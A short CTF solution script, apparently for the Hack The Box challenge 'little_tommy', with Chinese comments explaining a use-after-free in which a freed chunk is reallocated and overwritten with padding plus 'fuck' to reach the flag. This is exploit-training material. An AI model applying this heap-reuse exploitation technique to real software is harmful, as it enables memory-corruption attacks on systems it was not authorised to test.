考察UAF漏洞的复写
#coding:utf-8
from pwn import *
'''
解题思路:
输出flag条件为main_account+16=fuck,
Add功能strdup可以向堆写入256字节,而
且删除功能存在UAF,我们可以先创建一个
chunk1然后free掉,再通过Add功能添加一
个chunk2触发UAF,这样申请的chunk2,就
是chunk1的内存段,32位内存地址占4字字
节所以先填充16*4个A,然后只需要添加一
个fuck即可
'''
p=process('little_tommy')
#p=remote('docker.hackthebox.eu',30993)
p.sendline('1')
p.sendline('AAAA')
p.sendline('BBBB')
p.sendline('3')
p.sendline('4')
p.sendline('AAAA'*16+'fuck')
p.sendline('5')
p.interactive()